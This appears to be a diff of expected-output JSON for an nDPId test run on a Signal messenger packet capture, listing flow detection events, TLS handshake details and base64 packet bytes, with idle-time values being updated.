+01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1569051266396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0yV4AADQGy2MXORgQwKgCEQG73rjhiC9VLB07wYARAQL5ggAAAQEICpZOcwIoVP9f"} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569051266743,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266743,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV8AADQGy0oXORgQwKgCEQG73rjhiC89LB07wYAYAQKXnQAAAQEICpZOdF0oVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051267121,"flow_last_seen":1569051267121,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051267121,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1569051267121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051267121,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGbbHAqAIRDSP9Kt7DAbsjR8rsAAAAALAC\/\/\/U1AAAAgQFtAEDAwcBAQgKKFWeFwAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1569051267154,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051267154,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAPEG\/LQNI\/0qwKgCEQG73sO\/wI8zI0fK7aAScSCWtAAAAgQFrAQCCAqvNN\/RKFWeFwEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569051267161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051267161,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGbb3AqAIRDSP9Kt7DAbsjR8rtv8CPNIAQBAsybAAAAQEICihVnjqvNN\/R"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051267121,"flow_last_seen":1569051267161,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051267161,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":378,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01263{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":379,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051267121,"flow_last_seen":1569051267197,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":1569051267197,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cdn.signal.org","server_names":"cdn.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"c4b2785a87896e19d37eee932070cb22","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=cdn.signal.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"81:3D:8A:2E:EE:B2:E1:F4:1C:2B:6D:20:16:54:B2:C1:87:D0:1E:12"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569051245838,"flow_last_seen":1569051261595,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051255515,"flow_last_seen":1569051255541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":77,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569051264115,"flow_last_seen":1569051264115,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 